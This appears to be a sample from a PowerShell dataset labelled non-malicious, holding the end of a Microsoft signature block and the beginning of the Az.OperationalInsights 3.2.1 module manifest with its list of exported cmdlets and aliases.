# AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W
# 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY
# 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV
# APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37
# ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57
# xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t
# Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i
# 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk
# 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK
# 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO
# zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK
# YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm
# aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw
# OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD
# VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG
# 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la
# UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc
# 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D
# dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+
# lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk
# kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6
# A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd
# X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL
# 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd
# sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3
# T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS
# 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI
# bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL
# BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD
# uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv
# c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF
# BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h
# cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA
# YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn
# 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7
# v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b
# pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/
# KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy
# CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp
# mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi
# hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb
# BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS
# oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL
# gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX
# cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4x
# CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
# b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p
# Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA
# A64wDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw
# HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIGd0
# dQUp/KrLwnBhM+zhh3qFIxgjpxyxZJ6f5gediCiUMEIGCisGAQQBgjcCAQwxNDAy
# oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20wDQYJKoZIhvcNAQEBBQAEggEAG5EC6kkc83aNdH4wNdhyqMioentFbySZfXKv
# NKzV8rPgYBqzJ4Pct/cB/Pe0qxBmIKCg1J8+cGaTU7jwO6Ors30TCVfBB/i3kbAk
# J4Fi7uf82wPCWd/iFzYt9qNLQIcPuQ9eRirNxRHm0ScfyuXAy+usAhZ1SDvBxiNa
# GUmZkjYq8O4tvPPH8cBOTv+sFweNgkQtUGUDMMRixJOsqodOf47BeM6QXclQvwDg
# NOpG4c+VynCkLoPHzQ2paRjQUUeP2QrJx2cTg7bIDmtsr1kRp4haGAxROPguQC8J
# +K8o4U4bRxwn1bDJsJYK5RtNlVqszLDbi9j/wFio5QPt6E8SjqGCFykwghclBgor
# BgEEAYI3AwMBMYIXFTCCFxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZI
# AWUDBAIBBQAwggFZBgsqhkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGE
# WQoDATAxMA0GCWCGSAFlAwQCAQUABCAN/NRbipcK7TWg8YDHwWKj7uA5ZRuycnQT
# o/wbPY90UQIGZjOp0H2sGBMyMDI0MDUxNjA2NDIxNC43MDZaMASAAgH0oIHYpIHV
# MIHSMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL
# EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsT
# HVRoYWxlcyBUU1MgRVNOOjhENDEtNEJGNy1CM0I3MSUwIwYDVQQDExxNaWNyb3Nv
# ZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHj372b
# mhxogyIAAQAAAeMwDQYJKoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAg
# UENBIDIwMTAwHhcNMjMxMDEyMTkwNzI5WhcNMjUwMTEwMTkwNzI5WjCB0jELMAkG
# A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQx
# HjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9z
# b2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMg
# VFNTIEVTTjo4RDQxLTRCRjctQjNCNzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUt
# U3RhbXAgU2VydmljZTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAL6k
# DWgeRp+fxSBUD6N/yuEJpXggzBeNG5KB8M9AbIWeEokJgOghlMg8JmqkNsB4Wl1N
# EXR7cL6vlPCsWGLMhyqmscQu36/8h2bx6TU4M8dVZEd6V4U+l9gpte+VF91kOI35
# fOqJ6eQDMwSBQ5c9ElPFUijTA7zV7Y5PRYrS4FL9p494TidCpBEH5N6AO5u8wNA/
# jKO94Zkfjgu7sLF8SUdrc1GRNEk2F91L3pxR+32FsuQTZi8hqtrFpEORxbySgiQB
# P3cH7fPleN1NynhMRf6T7XC1L0PRyKy9MZ6TBWru2HeWivkxIue1nLQb/O/n0j2Q
# Vd42Zf0ArXB/Vq54gQ8JIvUH0cbvyWM8PomhFi6q2F7he43jhrxyvn1Xi1pwHOVs
# bH26YxDKTWxl20hfQLdzz4RVTo8cFRMdQCxlKkSnocPWqfV/4H5APSPXk0r8Cc/c
# Mmva3g4EvupF4ErbSO0UNnCRv7UDxlSGiwiGkmny53mqtAZ7NLePhFtwfxp6ATIo
# jl8JXjr3+bnQWUCDCd5Oap54fGeGYU8KxOohmz604BgT14e3sRWABpW+oXYSCyFQ
# 3SZQ3/LNTVby9ENsuEh2UIQKWU7lv7chrBrHCDw0jM+WwOjYUS7YxMAhaSyOahpb
# udALvRUXpQhELFoO6tOx/66hzqgjSTOEY3pu46BFAgMBAAGjggFJMIIBRTAdBgNV
# HQ4EFgQUsa4NZr41FbehZ8Y+ep2m2YiYqQMwHwYDVR0jBBgwFoAUn6cVXQBeYl2D
# 9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3Nv
# ZnQuY29tL3BraW9wcy9jcmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy
# MDIwMTAoMSkuY3JsMGwGCCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1l
# LVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUB
# Af8EDDAKBggrBgEFBQcDCDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQAD
# ggIBALe+my6p1NPMEW1t70a8Y2hGxj6siDSulGAs4UxmkfzxMAic4j0+GTPbHxk1
# 93mQ0FRPa9dtbRbaezV0GLkEsUWTGF2tP6WsDdl5/lD4wUQ76ArFOencCpK5svE0
# sO0FyhrJHZxMLCOclvd6vAIPOkZAYihBH/RXcxzbiliOCr//3w7REnsLuOp/7vlX
# JAsGzmJesBP/0ERqxjKudPWuBGz/qdRlJtOl5nv9NZkyLig4D5hy9p2Ec1zaotiL
# iHnJ9mlsJEcUDhYj8PnYnJjjsCxv+yJzao2aUHiIQzMbFq+M08c8uBEf+s37YbZQ
# 7XAFxwe2EVJAUwpWjmtJ3b3zSWTMmFWunFr2aLk6vVeS0u1MyEfEv+0bDk+N3jms
# CwbLkM9FaDi7q2HtUn3z6k7AnETc28dAvLf/ioqUrVYTwBrbRH4XVFEvaIQ+i7es
# DQicWW1dCDA/J3xOoCECV68611jriajfdVg8o0Wp+FCg5CAUtslgOFuiYULgcxnq
# zkmP2i58ZEa0rm4LZymHBzsIMU0yMmuVmAkYxbdEDi5XqlZIupPpqmD6/fLjD4ub
# 0SEEttOpg0np0ra/MNCfv/tVhJtz5wgiEIKX+s4akawLfY+16xDB64Nm0HoGs/Gy
# 823ulIm4GyrUcpNZxnXvE6OZMjI/V1AgSAg8U/heMWuZTWVUMIIHcTCCBVmgAwIB
# AgITMwAAABXF52ueAptJmQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UE
# BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc
# BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0
# IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1
# WhcNMzAwOTMwMTgzMjI1WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu
# Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv
# cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCC
# AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O
# 1YLT/e6cBwfSqWxOdcjKNVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZn
# hUYjDLWNE893MsAQGOhgfWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t
# 1w/YJlN8OWECesSq/XJprx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxq
# D89d9P6OU8/W7IVWTe/dvI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmP
# frVUj9z6BVWYbWg7mka97aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSW
# rAFKu75xqRdbZ2De+JKRHh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv
# 231fgLrbqn427DZM9ituqBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zb
# r17C89XYcz1DTsEzOUyOArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYcten
# IPDC+hIK12NvDMk2ZItboKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQc
# xWv2XFJRXRLbJbqvUAV6bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17a
# j54WcmnGrnu3tz5q4i6tAgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQAB
# MCMGCSsGAQQBgjcVAgQWBBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQU
# n6cVXQBeYl2D9OXSZacbUzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEw
# QTA/BggrBgEFBQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9E
# b2NzL1JlcG9zaXRvcnkuaHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQB
# gjcUAgQMHgoAUwB1AGIAQwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/
# MB8GA1UdIwQYMBaAFNX2VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJ
# oEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01p
# Y1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYB
# BQUHMAKGPmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9v
# Q2VyQXV0XzIwMTAtMDYtMjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3h
# LB9nATEkW+Geckv8qW/qXBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x
# 5MKP+2zRoZQYIu7pZmc6U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74p
# y27YP0h1AdkY3m2CDPVtI1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1A
# oL8ZthISEV09J+BAljis9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbC
# HcNhcy4sa3tuPywJeBTpkbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB
# 9s7GdP32THJvEKt1MMU0sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNt
# yo4JvbMBV0lUZNlz138eW0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3
# rsjoiV5PndLQTHa1V1QJsWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcV
# v7TOPqUxUYS8vwLBgqJ7Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A24
# 5oyZ1uEi6vAnQj0llOZ0dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lw
# Y1NNje6CbaUFEMFxBmoQtB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB
# 0jELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl
# ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMk
# TWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1U
# aGFsZXMgVFNTIEVTTjo4RDQxLTRCRjctQjNCNzElMCMGA1UEAxMcTWljcm9zb2Z0
# IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAPYiXu8ORQ4hvKcuE
# 7GK0COgxWnqggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu
# Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv
# cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAN
# BgkqhkiG9w0BAQUFAAIFAOnv80cwIhgPMjAyNDA1MTYxMDUxNTFaGA8yMDI0MDUx
# NzEwNTE1MVowdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA6e/zRwIBADAHAgEAAgIY
# FjAHAgEAAgIRgDAKAgUA6fFExwIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEE
# AYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GB
# AArYJu75laBFACHmVCdlAkaTxkAzukDDgo/7GdN5eepjZtkjBi9c6nIPYIh/cAOZ
# qsZ2CG6vzb8pWlfM1p3xuHAUPHVB0fzXRSH8BqOJ3gHyNc4vIdmxYHxlWVC3C/n0
# QIp3Bac2Iw793pGaJQA26KXDsH2nGVwxWk/H0krk6h45MYIEDTCCBAkCAQEwgZMw
# fDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl
# ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMd
# TWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHj372bmhxogyIAAQAA
# AeMwDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRAB
# BDAvBgkqhkiG9w0BCQQxIgQgFXmQ5qVisHSvZqIVlbervlw0Xsjr/D+Ue0WMT8F5
# HSYwgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHkMIG9BCAz1COr5bD+ZPdEgQjWvcIW
# uDJcQbdgq8Ndj0xyMuYmKjCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQI
# EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv
# ZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBD
# QSAyMDEwAhMzAAAB49+9m5ocaIMiAAEAAAHjMCIEIEuWfPppmlrjFhIBwZVulRhN
# bDX2wCYNSqFZft59LBvVMA0GCSqGSIb3DQEBCwUABIICAJk4/ceedADX+becHaXT
# GdUqPjyQSIX9kwmm3fJmhsykSNW60CS+NTHliQku8WHm+xIKkwc5JRLRWp+UWkg0
# 0rcpTYFzjeymdrp+jVT8/xaEZkfPRbeTptmFQ6nTWmuK2S6FBr8AwPmAPeb4hpvm
# QwaB8lswL95jydwJwRPdvbnazR2cZ7OuoVE1ras3pwNfPp5V1WHrDfI8QMwUX1IZ
# eScKXE3vSV1ObJ1GpvKGfDguc1THPV21naVa8LJR8m8oTa8syeAcjeA4grVJVJFY
# dEEK8/wq+vVxEPiZ8o8kwo0thV4pN+4VpBcohGZ/TI4hi0ciJeCwDVzLy7du1Hef
# jfL8ONiEWuwXhIaj4RZHEXaGv03iQFmBgSj3GpqdlvGDBPiN7UA13sT+e5O6wGAM
# DPaCELyLGWGQfXi7fpZsn7QO3l8iI90oYvLSVffrC6waacWrVaypyY459/wziQrV
# kFvJHyvDYT8AdYcn8rSLijeNfuQkhnUgan+mapkQIoxJsuUIyD7jmG8AjJEX+Los
# 6l6CRGtpnwrA3m3GI80dpBMAGZZAUwWSRyccGDaHm8gQzWcXwbiVD/IFB5YmKCCJ
# pgM4TsHN/ZGdyM/LTeAKLTRcXfr/IjRedQbX8ZuGqDy7MKY0L5jUulVRLh++haDS
# VYaENGbZwtv5pzr0pX1fQahC
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_47_64.ps1
|
sample_47_64.ps1
|
#
# Module manifest for module 'Az.OperationalInsights'
#
# Generated by: Microsoft Corporation
#
# Generated on: 5/16/2024
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'Az.OperationalInsights.psm1'
# Version number of this module.
ModuleVersion = '3.2.1'
# Supported PSEditions
CompatiblePSEditions = 'Core', 'Desktop'
# ID used to uniquely identify this module
GUID = 'c0fd6ad6-f349-46a5-a57b-4e8aa07544a0'
# Author of this module
Author = 'Microsoft Corporation'
# Company or vendor of this module
CompanyName = 'Microsoft Corporation'
# Copyright statement for this module
Copyright = 'Microsoft Corporation. All rights reserved.'
# Description of the functionality provided by this module
Description = 'Microsoft Azure PowerShell - Operational Insights service cmdlets for Azure Resource Manager in Windows PowerShell and PowerShell Core.'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '5.1'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
DotNetFrameworkVersion = '4.7.2'
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @()
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'Microsoft.Azure.Management.OperationalInsights.dll',
'Microsoft.Azure.OperationalInsights.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
FormatsToProcess = 'OperationalInsights.format.ps1xml'
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = @()
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Disable-AzOperationalInsightsIISLogCollection',
'Disable-AzOperationalInsightsLinuxCustomLogCollection',
'Disable-AzOperationalInsightsLinuxPerformanceCollection',
'Disable-AzOperationalInsightsLinuxSyslogCollection',
'Enable-AzOperationalInsightsIISLogCollection',
'Enable-AzOperationalInsightsLinuxCustomLogCollection',
'Enable-AzOperationalInsightsLinuxPerformanceCollection',
'Enable-AzOperationalInsightsLinuxSyslogCollection',
'Get-AzOperationalInsightsAvailableServiceTier',
'Get-AzOperationalInsightsCluster',
'Get-AzOperationalInsightsDataExport',
'Get-AzOperationalInsightsDataSource',
'Get-AzOperationalInsightsDeletedWorkspace',
'Get-AzOperationalInsightsIntelligencePack',
'Get-AzOperationalInsightsLinkedService',
'Get-AzOperationalInsightsLinkedStorageAccount',
'Get-AzOperationalInsightsOperation',
'Get-AzOperationalInsightsOperationStatus',
'Get-AzOperationalInsightsPurgeWorkspaceStatus',
'Get-AzOperationalInsightsSavedSearch',
'Get-AzOperationalInsightsSchema',
'Get-AzOperationalInsightsStorageInsight',
'Get-AzOperationalInsightsTable',
'Get-AzOperationalInsightsWorkspace',
'Get-AzOperationalInsightsWorkspaceManagementGroup',
'Get-AzOperationalInsightsWorkspaceSharedKey',
'Get-AzOperationalInsightsWorkspaceUsage',
'Invoke-AzOperationalInsightsMigrateTable',
'Invoke-AzOperationalInsightsQuery',
'New-AzOperationalInsightsApplicationInsightsDataSource',
'New-AzOperationalInsightsAzureActivityLogDataSource',
'New-AzOperationalInsightsCluster',
'New-AzOperationalInsightsComputerGroup',
'New-AzOperationalInsightsCustomLogDataSource',
'New-AzOperationalInsightsDataExport',
'New-AzOperationalInsightsLinkedStorageAccount',
'New-AzOperationalInsightsLinuxPerformanceObjectDataSource',
'New-AzOperationalInsightsLinuxSyslogDataSource',
'New-AzOperationalInsightsPurgeWorkspace',
'New-AzOperationalInsightsRestoreTable',
'New-AzOperationalInsightsSavedSearch',
'New-AzOperationalInsightsSearchTable',
'New-AzOperationalInsightsStorageInsight',
'New-AzOperationalInsightsTable',
'New-AzOperationalInsightsWindowsEventDataSource',
'New-AzOperationalInsightsWindowsPerformanceCounterDataSource',
'New-AzOperationalInsightsWorkspace',
'Remove-AzOperationalInsightsCluster',
'Remove-AzOperationalInsightsDataExport',
'Remove-AzOperationalInsightsDataSource',
'Remove-AzOperationalInsightsLinkedService',
'Remove-AzOperationalInsightsLinkedStorageAccount',
'Remove-AzOperationalInsightsSavedSearch',
'Remove-AzOperationalInsightsStorageInsight',
'Remove-AzOperationalInsightsTable',
'Remove-AzOperationalInsightsWorkspace',
'Restore-AzOperationalInsightsWorkspace',
'Set-AzOperationalInsightsDataSource',
'Set-AzOperationalInsightsIntelligencePack',
'Set-AzOperationalInsightsLinkedService',
'Set-AzOperationalInsightsLinkedStorageAccount',
'Set-AzOperationalInsightsSavedSearch',
'Set-AzOperationalInsightsStorageInsight',
'Set-AzOperationalInsightsWorkspace',
'Update-AzOperationalInsightsCluster',
'Update-AzOperationalInsightsDataExport',
'Update-AzOperationalInsightsTable',
'Update-AzOperationalInsightsWorkspaceSharedKey'
# Variables to export from this module
# VariablesToExport = @()
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = 'Get-AzOperationalInsightsIntelligencePacks',
'Get-AzOperationalInsightsWorkspaceManagementGroups',
'Get-AzOperationalInsightsWorkspaceSharedKeys',
'New-AzOperationalInsightsAzureAuditDataSource'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'Azure','ResourceManager','ARM','OperationalInsights'
# A URL to the license for this module.
LicenseUri = 'https://aka.ms/azps-license'
